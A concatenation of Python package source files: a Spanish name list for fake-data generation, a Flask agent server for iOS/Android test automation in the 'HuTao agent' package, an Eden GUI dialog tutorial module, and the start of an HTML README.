"Amaya",
"Amelia",
"Amor",
"Amparo",
"América",
"Ana",
"Ana Belén",
"Ana Sofía",
"Anabel",
"Anastasia",
"Andrea",
"Angelina",
"Angelita",
"Angélica",
"Ani",
"Anita",
"Anna",
"Anselma",
"Antonia",
"Anunciación",
"Apolonia",
"Araceli",
"Arcelia",
"Ariadna",
"Ariel",
"Armida",
"Aroa",
"Aránzazu",
"Ascensión",
"Asunción",
"Aura",
"Aurelia",
"Aurora",
"Azahar",
"Azahara",
"Azeneth",
"Azucena",
"Beatriz",
"Begoña",
"Belen",
"Belén",
"Benigna",
"Benita",
"Bernarda",
"Bernardita",
"Berta",
"Bibiana",
"Bienvenida",
"Blanca",
"Brunilda",
"Brígida",
"Bárbara",
"Calista",
"Calixta",
"Camila",
"Candela",
"Candelaria",
"Candelas",
"Caridad",
"Carina",
"Carla",
"Carlota",
"Carmela",
"Carmelita",
"Carmen",
"Carmina",
"Carolina",
"Casandra",
"Catalina",
"Cayetana",
"Cecilia",
"Celestina",
"Celia",
"Charo",
"Chelo",
"Chita",
"Chus",
"Cintia",
"Clara",
"Clarisa",
"Claudia",
"Clementina",
"Cloe",
"Clotilde",
"Concepción",
"Concha",
"Constanza",
"Consuela",
"Consuelo",
"Coral",
"Corona",
"Crescencia",
"Cristina",
"Cruz",
"Custodia",
"Cándida",
"Dafne",
"Dalila",
"Daniela",
"Delfina",
"Delia",
"Diana",
"Dionisia",
"Dolores",
"Dominga",
"Domitila",
"Dora",
"Dorita",
"Dorotea",
"Dulce",
"Débora",
"Edelmira",
"Elba",
"Elena",
"Eli",
"Eliana",
"Eligia",
"Elisa",
"Elisabet",
"Elodia",
"Eloísa",
"Elvira",
"Ema",
"Emelina",
"Emilia",
"Emiliana",
"Emma",
"Emperatriz",
"Encarna",
"Encarnacion",
"Encarnación",
"Encarnita",
"Esmeralda",
"Esperanza",
"Estefanía",
"Estela",
"Ester",
"Esther",
"Estrella",
"Etelvina",
"Eufemia",
"Eugenia",
"Eulalia",
"Eusebia",
"Eva",
"Eva María",
"Evangelina",
"Evelia",
"Evita",
"Fabiana",
"Fabiola",
"Fanny",
"Febe",
"Felicia",
"Feliciana",
"Felicidad",
"Felipa",
"Felisa",
"Fernanda",
"Fidela",
"Filomena",
"Flavia",
"Flor",
"Flora",
"Florencia",
"Florentina",
"Florina",
"Florinda",
"Fortunata",
"Francisca",
"Fátima",
"Gabriela",
"Gala",
"Gema",
"Genoveva",
"Georgina",
"Gertrudis",
"Gisela",
"Gloria",
"Gracia",
"Graciana",
"Graciela",
"Griselda",
"Guadalupe",
"Guiomar",
"Haydée",
"Herminia",
"Hilda",
"Hortensia",
"Ignacia",
"Ileana",
"Imelda",
"Inmaculada",
"Inés",
"Irene",
"Iris",
"Irma",
"Isa",
"Isabel",
"Isabela",
"Isaura",
"Isidora",
"Itziar",
"Jacinta",
"Javiera",
"Jennifer",
"Jenny",
"Jessica",
"Jesusa",
"Jimena",
"Joaquina",
"Jordana",
"Josefa",
"Josefina",
"José",
"Jovita",
"Juana",
"Juanita",
"Judith",
"Julia",
"Juliana",
"Julie",
"Julieta",
"Lara",
"Laura",
"Leandra",
"Leire",
"Leocadia",
"Leonor",
"Leticia",
"Leyre",
"Lidia",
"Ligia",
"Lilia",
"Liliana",
"Lina",
"Loida",
"Lola",
"Lorena",
"Lorenza",
"Loreto",
"Lourdes",
"Luciana",
"Lucila",
"Lucía",
"Luisa",
"Luisina",
"Luna",
"Lupe",
"Lupita",
"Luz",
"Macarena",
"Macaria",
"Magdalena",
"Maite",
"Malena",
"Mamen",
"Manola",
"Manu",
"Manuela",
"Manuelita",
"Mar",
"Marcela",
"Marcia",
"Margarita",
"Mariana",
"Marianela",
"Maribel",
"Maricela",
"Maricruz",
"Marina",
"Marisa",
"Marisela",
"Marisol",
"Maristela",
"Marita",
"Marta",
"Martina",
"Martirio",
"María",
"María Belén",
"María Carmen",
"María Cristina",
"María Del Carmen",
"María Dolores",
"María Fernanda",
"María Jesús",
"María José",
"María Luisa",
"María Manuela",
"María Pilar",
"María Teresa",
"María Ángeles",
"Matilde",
"Maura",
"Maxi",
"Mayte",
"Melania",
"Melisa",
"Mercedes",
"Merche",
"Micaela",
"Miguela",
"Milagros",
"Mireia",
"Miriam",
"Mirta",
"Modesta",
"Montserrat",
"Morena",
"Máxima",
"Mónica",
"Nadia",
"Narcisa",
"Natalia",
"Natividad",
"Nayara",
"Nazaret",
"Nerea",
"Nereida",
"Nicolasa",
"Nidia",
"Nieves",
"Nilda",
"Noa",
"Noelia",
"Noemí",
"Nuria",
"Nydia",
"Nélida",
"Obdulia",
"Octavia",
"Odalis",
"Odalys",
"Ofelia",
"Olalla",
"Olga",
"Olimpia",
"Olivia",
"Oriana",
"Otilia",
"Paca",
"Pacífica",
"Palmira",
"Paloma",
"Paola",
"Pascuala",
"Pastora",
"Patricia",
"Paula",
"Paulina",
"Paz",
"Pepita",
"Perla",
"Perlita",
"Petrona",
"Piedad",
"Pilar",
"Pili",
"Primitiva",
"Priscila",
"Prudencia",
"Purificación",
"Pía",
"Rafaela",
"Ramona",
"Raquel",
"Rebeca",
"Regina",
"Reina",
"Remedios",
"Renata",
"Reyes",
"Reyna",
"Ricarda",
"Rita",
"Roberta",
"Rocío",
"Rosa",
"Rosa María",
"Rosalina",
"Rosalinda",
"Rosalva",
"Rosalía",
"Rosario",
"Rosaura",
"Rosenda",
"Roxana",
"Rufina",
"Ruperta",
"Ruth",
"Sabina",
"Salomé",
"Salud",
"Samanta",
"Sandra",
"Sara",
"Sarita",
"Saturnina",
"Selena",
"Serafina",
"Silvia",
"Socorro",
"Sofía",
"Sol",
"Soledad",
"Sonia",
"Soraya",
"Susana",
"Susanita",
"Tamara",
"Tania",
"Tatiana",
"Tecla",
"Teodora",
"Tere",
"Teresa",
"Teresita",
"Teófila",
"Tomasa",
"Trini",
"Trinidad",
"Valentina",
"Valeria",
"Vanesa",
"Vera",
"Verónica",
"Vicenta",
"Victoria",
"Vilma",
"Violeta",
"Virginia",
"Visitación",
"Viviana",
"Ximena",
"Xiomara",
"Yaiza",
"Yolanda",
"Yésica",
"Yéssica",
"Zaida",
"Zaira",
"Zoraida",
"África",
"Ágata",
"Águeda",
"Ámbar",
"Ángela",
"Ángeles",
"Áurea",
"Íngrid",
"Úrsula",
)
first_names = first_names_male + first_names_female
last_names = (
"Abad",
"Abascal",
"Abella",
"Abellán",
"Abril",
"Acedo",
"Acero",
"Acevedo",
"Acosta",
"Acuña",
"Adadia",
"Adán",
"Aguado",
"Agudo",
"Aguilar",
"Aguilera",
"Aguiló",
"Aguirre",
"Agullo",
"Agustí",
"Agustín",
"Alarcón",
"Alba",
"Alberdi",
"Albero",
"Alberola",
"Alberto",
"Alcalde",
"Alcalá",
"Alcaraz",
"Alcolea",
"Alcántara",
"Alcázar",
"Alegre",
"Alegria",
"Alemany",
"Alemán",
"Alfaro",
"Alfonso",
"Aliaga",
"Aller",
"Almagro",
"Almansa",
"Almazán",
"Almeida",
"Alonso",
"Alsina",
"Alvarado",
"Alvarez",
"Amador",
"Amat",
"Amaya",
"Amigó",
"Amo",
"Amor",
"Amores",
"Amorós",
"Anaya",
"Andrade",
"Andres",
"Andreu",
"Andrés",
"Anglada",
"Anguita",
"Angulo",
"Antón",
"Antúnez",
"Aparicio",
"Aragonés",
"Aragón",
"Aramburu",
"Arana",
"Aranda",
"Araujo",
"Arce",
"Arco",
"Arcos",
"Arellano",
"Arenas",
"Arias",
"Ariza",
"Ariño",
"Arjona",
"Armas",
"Armengol",
"Arnaiz",
"Arnal",
"Arnau",
"Aroca",
"Arranz",
"Arregui",
"Arribas",
"Arrieta",
"Arroyo",
"Arteaga",
"Artigas",
"Arévalo",
"Asenjo",
"Asensio",
"Atienza",
"Avilés",
"Ayala",
"Ayllón",
"Ayuso",
"Azcona",
"Aznar",
"Azorin",
"Badía",
"Baena",
"Baeza",
"Balaguer",
"Ballester",
"Ballesteros",
"Baquero",
"Barba",
"Barbero",
"Barberá",
"Barceló",
"Barco",
"Barragán",
"Barral",
"Barranco",
"Barreda",
"Barrena",
"Barrera",
"Barriga",
"Barrio",
"Barrios",
"Barros",
"Barroso",
"Bartolomé",
"Baró",
"Barón",
"Bas",
"Bastida",
"Batalla",
"Batlle",
"Bautista",
"Bauzà",
"Bayo",
"Bayona",
"Bayón",
"Baños",
"Becerra",
"Bejarano",
"Belda",
"Bellido",
"Bello",
"Belmonte",
"Beltran",
"Beltrán",
"Benavent",
"Benavente",
"Benavides",
"Benet",
"Benitez",
"Benito",
"Benítez",
"Berenguer",
"Bermejo",
"Bermudez",
"Bermúdez",
"Bernad",
"Bernal",
"Bernat",
"Berrocal",
"Bertrán",
"Bilbao",
"Blanca",
"Blanch",
"Blanco",
"Blanes",
"Blasco",
"Blazquez",
"Blázquez",
"Boada",
"Boix",
"Bolaños",
"Bonet",
"Bonilla",
"Borja",
"Borrego",
"Borrell",
"Borrás",
"Bosch",
"Botella",
"Bou",
"Bravo",
"Briones",
"Bru",
"Buendía",
"Bueno",
"Burgos",
"Busquets",
"Bustamante",
"Bustos",
"Báez",
"Bárcena",
"Caballero",
"Cabanillas",
"Cabañas",
"Cabello",
"Cabeza",
"Cabezas",
"Cabo",
"Cabrera",
"Cabrero",
"Cadenas",
"Cal",
"Calatayud",
"Calderon",
"Calderón",
"Calleja",
"Calvet",
"Calvo",
"Calzada",
"Camacho",
"Camino",
"Campillo",
"Campo",
"Campos",
"Campoy",
"Camps",
"Canales",
"Canals",
"Canet",
"Cano",
"Cantero",
"Cantón",
"Caparrós",
"Capdevila",
"Carbajo",
"Carballo",
"Carbonell",
"Carbó",
"Cardona",
"Carlos",
"Carmona",
"Carnero",
"Caro",
"Carpio",
"Carranza",
"Carrasco",
"Carrera",
"Carreras",
"Carretero",
"Carreño",
"Carrillo",
"Carrión",
"Carro",
"Carvajal",
"Casado",
"Casal",
"Casals",
"Casanova",
"Casanovas",
"Casares",
"Casas",
"Cases",
"Castañeda",
"Castejón",
"Castell",
"Castellanos",
"Castells",
"Castelló",
"Castilla",
"Castillo",
"Castrillo",
"Castro",
"Catalá",
"Catalán",
"Cazorla",
"Cañas",
"Cañellas",
"Cañete",
"Cañizares",
"Cepeda",
"Cerdá",
"Cerdán",
"Cerezo",
"Cerro",
"Cervantes",
"Cervera",
"Chacón",
"Chamorro",
"Chaparro",
"Chaves",
"Checa",
"Chico",
"Cid",
"Cifuentes",
"Cisneros",
"Clavero",
"Clemente",
"Cobo",
"Cobos",
"Coca",
"Codina",
"Coello",
"Coll",
"Collado",
"Colom",
"Coloma",
"Colomer",
"Comas",
"Company",
"Conde",
"Conesa",
"Contreras",
"Corbacho",
"Cordero",
"Cornejo",
"Corominas",
"Coronado",
"Corral",
"Correa",
"Cortes",
"Cortina",
"Cortés",
"Costa",
"Crespi",
"Crespo",
"Criado",
"Cruz",
"Cuadrado",
"Cuenca",
"Cuervo",
"Cuesta",
"Cueto",
"Cuevas",
"Cuéllar",
"Cáceres",
"Cámara",
"Cánovas",
"Cárdenas",
"Céspedes",
"Córdoba",
"Cózar",
"Dalmau",
"Daza",
"Delgado",
"Diaz",
"Diego",
"Diez",
"Diéguez",
"Domingo",
"Dominguez",
"Doménech",
"Domínguez",
"Donaire",
"Donoso",
"Duarte",
"Dueñas",
"Duque",
"Duran",
"Durán",
"Dávila",
"Díaz",
"Díez",
"Echevarría",
"Echeverría",
"Egea",
"Elorza",
"Elías",
"Enríquez",
"Escalona",
"Escamilla",
"Escobar",
"Escolano",
"Escribano",
"Escrivá",
"Escudero",
"Espada",
"Esparza",
"España",
"Español",
"Espejo",
"Espinosa",
"Esteban",
"Esteve",
"Estevez",
"Estrada",
"Estévez",
"Exposito",
"Expósito",
"Fabra",
"Fabregat",
"Fajardo",
"Falcó",
"Falcón",
"Farré",
"Feijoo",
"Feliu",
"Fernandez",
"Fernández",
"Ferrando",
"Ferrer",
"Ferrera",
"Ferreras",
"Ferrero",
"Ferrán",
"Ferrández",
"Ferrándiz",
"Figueras",
"Figueroa",
"Figuerola",
"Fiol",
"Flor",
"Flores",
"Folch",
"Fonseca",
"Font",
"Fortuny",
"Franch",
"Francisco",
"Franco",
"Frutos",
"Frías",
"Fuente",
"Fuentes",
"Fuertes",
"Fuster",
"Fábregas",
"Gabaldón",
"Galan",
"Galiano",
"Galindo",
"Gallardo",
"Gallart",
"Gallego",
"Gallo",
"Galvez",
"Galván",
"Galán",
"Garay",
"Garcia",
"Garcés",
"García",
"Gargallo",
"Garmendia",
"Garrido",
"Garriga",
"Garzón",
"Gascón",
"Gaya",
"Gelabert",
"Gibert",
"Gil",
"Gilabert",
"Gimenez",
"Gimeno",
"Giménez",
"Giner",
"Giralt",
"Girona",
"Girón",
"Gisbert",
"Godoy",
"Goicoechea",
"Gomez",
"Gomila",
"Gomis",
"Gonzalez",
"Gonzalo",
"González",
"Gordillo",
"Goñi",
"Gracia",
"Granados",
"Grande",
"Gras",
"Grau",
"Gual",
"Guardia",
"Guardiola",
"Guerra",
"Guerrero",
"Guijarro",
"Guillen",
"Guillén",
"Guitart",
"Gutierrez",
"Gutiérrez",
"Guzman",
"Guzmán",
"Gálvez",
"Gámez",
"Gárate",
"Gómez",
"Haro",
"Heras",
"Heredia",
"Hernandez",
"Hernando",
"Hernández",
"Herranz",
"Herrera",
"Herrero",
"Hervia",
"Hervás",
"Hidalgo",
"Hierro",
"Higueras",
"Hoyos",
"Hoz",
"Huerta",
"Huertas",
"Huguet",
"Hurtado",
"Ibarra",
"Ibañez",
"Iborra",
"Ibáñez",
"Iglesia",
"Iglesias",
"Infante",
"Iniesta",
"Iriarte",
"Isern",
"Izaguirre",
"Izquierdo",
"Iñiguez",
"Jara",
"Jaume",
"Jaén",
"Jerez",
"Jimenez",
"Jiménez",
"Jordá",
"Jordán",
"Jove",
"Jover",
"Juan",
"Juliá",
"Julián",
"Jurado",
"Juárez",
"Jáuregui",
"Jódar",
"Lago",
"Laguna",
"Lamas",
"Landa",
"Lara",
"Larrañaga",
"Larrea",
"Lasa",
"Lastra",
"Leal",
"Ledesma",
"Leiva",
"Leon",
"Lerma",
"León",
"Lillo",
"Linares",
"Llabrés",
"Lladó",
"Llamas",
"Llano",
"Llanos",
"Lledó",
"Llobet",
"Llopis",
"Llorens",
"Llorente",
"Lloret",
"Lluch",
"Lobato",
"Lobo",
"Lopez",
"Lorenzo",
"Losa",
"Losada",
"Lozano",
"Lucas",
"Lucena",
"Luján",
"Lumbreras",
"Luna",
"Luque",
"Luz",
"Luís",
"López",
"Machado",
"Macias",
"Macías",
"Madrid",
"Madrigal",
"Maestre",
"Maldonado",
"Malo",
"Mancebo",
"Manjón",
"Manrique",
"Manso",
"Manuel",
"Manzanares",
"Manzano",
"Marco",
"Marcos",
"Marin",
"Mariscal",
"Mariño",
"Marquez",
"Marqués",
"Marti",
"Martin",
"Martinez",
"Martorell",
"Martí",
"Martín",
"Martínez",
"Marí",
"Marín",
"Mas",
"Mascaró",
"Mata",
"Matas",
"Mate",
"Mateo",
"Mateos",
"Mateu",
"Mayo",
"Mayol",
"Mayoral",
"Maza",
"Medina",
"Melero",
"Meléndez",
"Mena",
"Mendez",
"Mendizábal",
"Mendoza",
"Menendez",
"Menéndez",
"Mercader",
"Merino",
"Mesa",
"Miguel",
"Milla",
"Millán",
"Mir",
"Miralles",
"Miranda",
"Miró",
"Moles",
"Molina",
"Moliner",
"Molins",
"Moll",
"Monreal",
"Montalbán",
"Montaña",
"Montenegro",
"Montero",
"Montes",
"Montesinos",
"Montoya",
"Montserrat",
"Mora",
"Moraleda",
"Morales",
"Morante",
"Morata",
"Morcillo",
"Morell",
"Moreno",
"Morera",
"Morillo",
"Morán",
"Mosquera",
"Moya",
"Mulet",
"Mur",
"Murcia",
"Murillo",
"Muro",
"Muñoz",
"Mármol",
"Márquez",
"Méndez",
"Mínguez",
"Múgica",
"Múñiz",
"Nadal",
"Naranjo",
"Narváez",
"Navarrete",
"Navarro",
"Navas",
"Nebot",
"Neira",
"Nevado",
"Nicolau",
"Nicolás",
"Nieto",
"Niño",
"Nogueira",
"Noguera",
"Nogués",
"Noriega",
"Novoa",
"Nuñez",
"Núñez",
"Ocaña",
"Ochoa",
"Ojeda",
"Oliva",
"Olivares",
"Oliver",
"Olivera",
"Oliveras",
"Olivé",
"Oller",
"Olmedo",
"Olmo",
"Ordóñez",
"Orozco",
"Ortega",
"Ortiz",
"Ortuño",
"Osorio",
"Osuna",
"Otero",
"Pablo",
"Pacheco",
"Padilla",
"Pagès",
"Palacio",
"Palacios",
"Palau",
"Pallarès",
"Palma",
"Palmer",
"Palomar",
"Palomares",
"Palomino",
"Palomo",
"Paniagua",
"Pardo",
"Paredes",
"Pareja",
"Parejo",
"Parra",
"Pascual",
"Pastor",
"Patiño",
"Pavón",
"Paz",
"Pazos",
"Pedraza",
"Pedrero",
"Pedro",
"Pedrosa",
"Peinado",
"Peiró",
"Pelayo",
"Pellicer",
"Peláez",
"Pera",
"Peral",
"Perales",
"Peralta",
"Perea",
"Pereira",
"Perelló",
"Perera",
"Perez",
"Peña",
"Peñalver",
"Peñas",
"Pi",
"Pina",
"Pineda",
"Pinedo",
"Pinilla",
"Pino",
"Pinto",
"Pintor",
"Piquer",
"Pizarro",
"Piña",
"Piñeiro",
"Piñol",
"Pla",
"Plana",
"Planas",
"Plaza",
"Pol",
"Polo",
"Pomares",
"Pombo",
"Ponce",
"Pons",
"Pont",
"Porcel",
"Porras",
"Porta",
"Portero",
"Portillo",
"Posada",
"Pou",
"Poza",
"Pozo",
"Pozuelo",
"Prada",
"Prado",
"Prat",
"Prats",
"Priego",
"Prieto",
"Puente",
"Puerta",
"Puga",
"Puig",
"Pujadas",
"Pujol",
"Pulido",
"Páez",
"Pérez",
"Quero",
"Querol",
"Quesada",
"Quevedo",
"Quintana",
"Quintanilla",
"Quintero",
"Quiroga",
"Quirós",
"Ramirez",
"Ramis",
"Ramos",
"Ramírez",
"Ramón",
"Raya",
"Real",
"Rebollo",
"Recio",
"Redondo",
"Reguera",
"Reig",
"Reina",
"Requena",
"Revilla",
"Rey",
"Reyes",
"Riba",
"Ribas",
"Ribera",
"Ribes",
"Ricart",
"Rico",
"Riera",
"Rincón",
"Rios",
"Ripoll",
"Riquelme",
"Rius",
"Rivas",
"Rivera",
"Rivero",
"Robledo",
"Robles",
"Roca",
"Rocamora",
"Rocha",
"Roda",
"Rodrigo",
"Rodriguez",
"Rodríguez",
"Roig",
"Rojas",
"Roldan",
"Roldán",
"Roma",
"Roman",
"Romero",
"Romeu",
"Román",
"Ropero",
"Ros",
"Rosa",
"Rosado",
"Rosales",
"Rosell",
"Roselló",
"Rosselló",
"Roura",
"Rovira",
"Royo",
"Rozas",
"Ruano",
"Rubio",
"Rueda",
"Ruiz",
"Río",
"Ríos",
"Ródenas",
"Saavedra",
"Sabater",
"Sacristán",
"Saez",
"Sainz",
"Sala",
"Salamanca",
"Salas",
"Salazar",
"Salcedo",
"Saldaña",
"Sales",
"Salgado",
"Salinas",
"Salmerón",
"Salom",
"Salvador",
"Salvà",
"Samper",
"Sanabria",
"Sanchez",
"Sancho",
"Sandoval",
"Sanjuan",
"Sanmartín",
"Sanmiguel",
"Sans",
"Santamaria",
"Santamaría",
"Santana",
"Santiago",
"Santos",
"Sanz",
"Sarabia",
"Sarmiento",
"Sastre",
"Saura",
"Sebastián",
"Seco",
"Sedano",
"Segarra",
"Segovia",
"Segura",
"Seguí",
"Serna",
"Serra",
"Serrano",
"Sevilla",
"Sevillano",
"Sierra",
"Silva",
"Simó",
"Sobrino",
"Sola",
"Solana",
"Solano",
"Soler",
"Solera",
"Solsona",
"Solé",
"Solís",
"Somoza",
"Soria",
"Soriano",
"Sosa",
"Sotelo",
"Soto",
"Suarez",
"Sureda",
"Suárez",
"Sáenz",
"Sáez",
"Sánchez",
"Taboada",
"Talavera",
"Tamarit",
"Tamayo",
"Tapia",
"Tejada",
"Tejedor",
"Tejera",
"Tejero",
"Tello",
"Tena",
"Tenorio",
"Terrón",
"Teruel",
"Tirado",
"Toledo",
"Tolosa",
"Tomas",
"Tomás",
"Tomé",
"Tormo",
"Toro",
"Torralba",
"Torre",
"Torrecilla",
"Torrens",
"Torrent",
"Torrents",
"Torres",
"Torrijos",
"Tovar",
"Trillo",
"Trujillo",
"Tudela",
"Tur",
"Téllez",
"Ugarte",
"Ureña",
"Uriarte",
"Uribe",
"Urrutia",
"Uría",
"Valbuena",
"Valcárcel",
"Valderrama",
"Valdés",
"Valencia",
"Valenciano",
"Valentín",
"Valenzuela",
"Valera",
"Valero",
"Vall",
"Valle",
"Vallejo",
"Valls",
"Vallés",
"Valverde",
"Vaquero",
"Vara",
"Varela",
"Vargas",
"Vazquez",
"Vega",
"Velasco",
"Velázquez",
"Vendrell",
"Vera",
"Verdejo",
"Verdugo",
"Verdú",
"Vergara",
"Viana",
"Vicens",
"Vicente",
"Vidal",
"Vigil",
"Vila",
"Vilalta",
"Vilanova",
"Vilaplana",
"Vilar",
"Villa",
"Villalba",
"Villalobos",
"Villalonga",
"Villanueva",
"Villar",
"Villaverde",
"Villegas",
"Villena",
"Vives",
"Vizcaíno",
"Viña",
"Viñas",
"Vázquez",
"Vélez",
"Yuste",
"Yáñez",
"Zabala",
"Zabaleta",
"Zamora",
"Zamorano",
"Zapata",
"Zaragoza",
"Zorrilla",
"Zurita",
"Águila",
"Álamo",
"Álvarez",
"Álvaro",
"Ángel",
"Ávila",
)
prefixes = ("de", "del") | PypiClean |
/HuTao%20agent-1.0.3.tar.gz/HuTao agent-1.0.3/walnut_agent/script/flask_client.py
# @File : flask_client.py
# @Date : 2022-02-08
# @Author : chenbo
__author__ = 'chenbo'
import argparse
import threading
import time
import sys
from loguru import logger
from flask import Flask, request, jsonify, Response
from fast_dict import Dictionary
from walnut_agent.common import do_monkeylog, do_json
from walnut_agent.script.agent import iOS_monkey_start, iOS_monkey_shutdown
from walnut_agent.script.util_handle import route, setting
from walnut_agent.script import http_handle, agent
from walnut_agent.script.app_handle import tid, add
from typing import Any
def respModel(result, isCheck=True):
    # "失败" ("failure") in the result marks an error response
    if str(result).find("失败") != -1 and isCheck is True:
return do_json.dumps({"code": "8020", "msg": None, "success": False, "result": result, "tid": None, "ext": None})
else:
return do_json.dumps({"code": "8000", "msg": None, "success": True, "result": result, "tid": None, "ext": None})
class JsonResponse(Response):
@classmethod
def force_type(
cls, response: "Response", environ=None
) -> "JsonResponse":
if isinstance(response, (list, dict)):
response = jsonify(response)
return super(Response, cls).force_type(response, environ)
class FlaskApp(Flask):
def __init__(self, *args, **kwargs):
super(FlaskApp, self).__init__(*args, **kwargs)
def run(
self,
host: str = None,
port: int = None,
debug: bool = None,
load_dotenv: bool = True,
**options: Any,
) -> None:
self._activate_background_job(host, port)
super().run(host, port, debug, load_dotenv, **options)
def _activate_background_job(self,
host: str = None,
port: int = None,
):
"""
连接主服务器 heartbeat
"""
def run_job():
time.sleep(3)
http_handle.master_service.join_client(host, port, setting.agent.name)
t1 = threading.Thread(target=run_job)
t1.start()
app = FlaskApp(__name__)
app.response_class = JsonResponse
app.config["JSON_AS_ASCII"] = False
connected = {
"ios": ''
}
@app.route('/', methods=["GET"])
def home():
"""
返回所有接口的简易信息
"""
data = Dictionary({
"local": setting.agent.ip,
"path": Dictionary({
"root": route.BASE_DIR.__str__(),
"script": route.SCRIPT_PATH.__str__(),
"log": route.LOG_PATH.__str__(),
"report": route.REPORT_PATH.__str__(),
"export": route.EXPORT_PATH.__str__()
}),
"api": [
{
"path": "/runner",
"args": {
"task": "int"
},
"help": "执行任务"
},
{
"path": "/udid",
"args": {
},
"help": "获取已连接状态的设备id"
}
]
})
return data
@app.route('/runner', methods=["GET"])
def runner():
"""
执行任务
参数: task: int 任务id
"""
data = Dictionary({
"succeed": True,
"msg": "",
"data": None
})
if request.args is None:
data["succeed"] = False
data["msg"] = "请输入需要运行的任务id"
else:
task: str = request.args.to_dict().setdefault("task", None)
data["data"] = agent.run_task(task_id=task)
return data
@app.route('/udid', methods=["GET"])
def udid():
"""
获取已连接状态的设备id
"""
state = http_handle.wda_state.state()
data = Dictionary({
"iOS": tid.get_info(),
"Android": add.get_info(),
"ios_connected": connected["ios"] if state else ''
})
return respModel(data)
@app.route('/start_wda', methods=["GET"])
def start_wda():
data = Dictionary({
"msg": "请求成功"
})
if request.args is None:
data["msg"] = "参数udid不能为空"
else:
req: dict = request.args.to_dict()
udid: str = req.setdefault("udid", None)
if udid and udid in tid.get_devices():
connected["ios"] = udid
data["msg"] = agent.iOS_wda_start(udid)
else:
data["msg"] = "设备不存在或未连接"
return data
@app.route('/ios_monkey', methods=["GET"])
def ios_monkey():
udid = request.args.get("udid")
appid = request.args.get("appid")
duration = request.args.get("duration")
throttle = request.args.get("throttle")
yppno = request.args.get("yppno")
tester = request.args.get("tester")
monkey_msg = iOS_monkey_start(udid, appid, duration, yppno, tester, throttle)
return respModel(monkey_msg)
@app.route('/ios_monkey_shutdown', methods=["GET"])
def ios_monkey_shutdown():
thread_id = request.args.get("thread_id")
record_id = request.args.get("record_id")
monkey_msg = iOS_monkey_shutdown(record_id, thread_id)
return respModel(monkey_msg)
@app.route('/end_wda', methods=["GET"])
def end_wda():
data = Dictionary({
"msg": "请求成功"
})
tid.end_wda()
connected["ios"] = ''
return data
@app.route('/status_wda', methods=["GET"])
def status_wda():
state = http_handle.wda_state.state()
data = Dictionary({
"state": state
})
return data
@app.route('/ios_info', methods=["GET"])
def ios_info():
data = Dictionary({
"list": tid.get_info()
})
return data
@app.route('/collect_ios_monkey_log', methods=["GET"])
def collect_ios_monkey_log():
record_id = request.args.get("record_id")
return respModel(do_monkeylog.collect_ios_monkey_log(record_id))
def main():
parser = argparse.ArgumentParser(description="")
parser.add_argument(
'-V', '--version', dest='version', action='store_true',
help="show version")
parser.add_argument(
'-D', '--debug', dest='debug', action='store_true',
help="show version")
args = parser.parse_args()
if args.version:
from ..__about__ import __version__
msg = f"HuTao Version:{__version__}"
print(msg)
exit(0)
log_file = route.BASE_DIR / 'runtime' / 'agent{time}.log'
    # Log levels from lowest to highest: DEBUG < INFO < WARNING < ERROR < CRITICAL
config = {
"handlers": [
{"sink": sys.stdout, "format": "{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}",
"backtrace": True,
"level": 'WARNING',
"diagnose": True},
            # Also write logs to a file
            # rotation: size at which the log file rolls over; retention: how long logs are kept;
            # compression: archive format; serialize: serialize log records as JSON
{"sink": log_file,
"backtrace": True,
"serialize": False,
"rotation": "500 MB", "retention": "3 days", "compression": "zip"},
],
"extra": {"user": "someone"}
}
logger.configure(**config)
    # Enable debug mode
flask_debug = False
if args.debug:
flask_debug = True
    # Report this agent's IP and port to the master server
app.run(
host="0.0.0.0",
port=setting.agent.port,
debug=flask_debug
)
if __name__ == '__main__':
main() | PypiClean |
/Eden-2.1.14.zip/Eden-2.1.14/eden/tutorialWinForms/projectionsDynamic/pdProjectionDialog.py |
# pdProjectionDialog.py
from org.qquick.eden import *
from pdAddPointsDialog import *
from pdRemovePointsDialog import *
from pdEditPointsDialog import *
class ProjectionDialog (Module):
def __init__ (self, main, viewStore):
self.main = main
main.nrOfProjectionsNode.follow (main.nrOfProjectionsNode.old + 1)
currentViewStore.value = viewStore
Module.__init__ (self, 'projectionDialog', True)
viewStore.load ()
def defineModules (self):
self.addPointsDialog = self.addModule (AddPointsDialog (self))
self.removePointsDialog = self.addModule (RemovePointsDialog (self))
self.editPointsDialog = self.addModule (EditPointsDialog (self))
def defineNodes (self):
self.pointsNode = Node ()
self.selectedPointsNode = Node ([])
self.sortColumnNumberNode = Node (0)
self.doAddPointsNode = Node (None)
self.doRemovePointsNode = Node (None)
self.doEditPointsNode = Node (None)
self.doCloseNode = Node (None)
self.doExitNode = Node (None)
def defineDependencies (self):
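        # pointsNode is recomputed (re-sorted) whenever the main point list or
        # the selected sort column changes.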
self.pointsNode.dependsOn (
[self.main.pointsNode, self.sortColumnNumberNode],
lambda: sortList (self.main.pointsNode.new, self.sortColumnNumberNode.new)
)
def defineViews (self):
return ModelessView (
VGridView ([
LLabelView ('All points'),
HGridView ([
ListView (
self.pointsNode,
PointColumnLabels,
selectedListNode = self.selectedPointsNode,
key = 'projectionPointsList',
sortColumnNumberNode = self.sortColumnNumberNode
),
HExtensionView (), HExtensionView (),
VGridView ([
ButtonView (self.doAddPointsNode, 'Add', hint = 'Add a range of points'),
ButtonView (self.doRemovePointsNode, 'Remove', hint = 'Remove the selected points'),
ButtonView (self.doEditPointsNode, 'Edit', 'Edit the selected points'),
StretchView (),
ButtonView (self.doCloseNode, 'Close', 'Close this projection view')
])
])
]),
'ProjectionDialog',
fixedSize = True,
key = 'Projection view',
exitActionNode = self.doExitNode
)
def defineActions (self):
self.doAddPointsNode.action = self.addPointsDialog.getView () .execute
self.doRemovePointsNode.action = self.removePointsDialog.getView () .execute
self.doEditPointsNode.action = self.editPointsDialog.getView () .execute
self.doCloseNode.action = self.getView () .exit
self.doExitNode.action = lambda: self.main.nrOfProjectionsNode.follow (self.main.nrOfProjectionsNode.old - 1) | PypiClean |
/IntervalArithmetic-0.2.0.tar.gz/IntervalArithmetic-0.2.0/README.html | <?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="generator" content="Docutils 0.13.1: http://docutils.sourceforge.net/" />
<title>IntervalArithmetic</title>
<style type="text/css">
/*
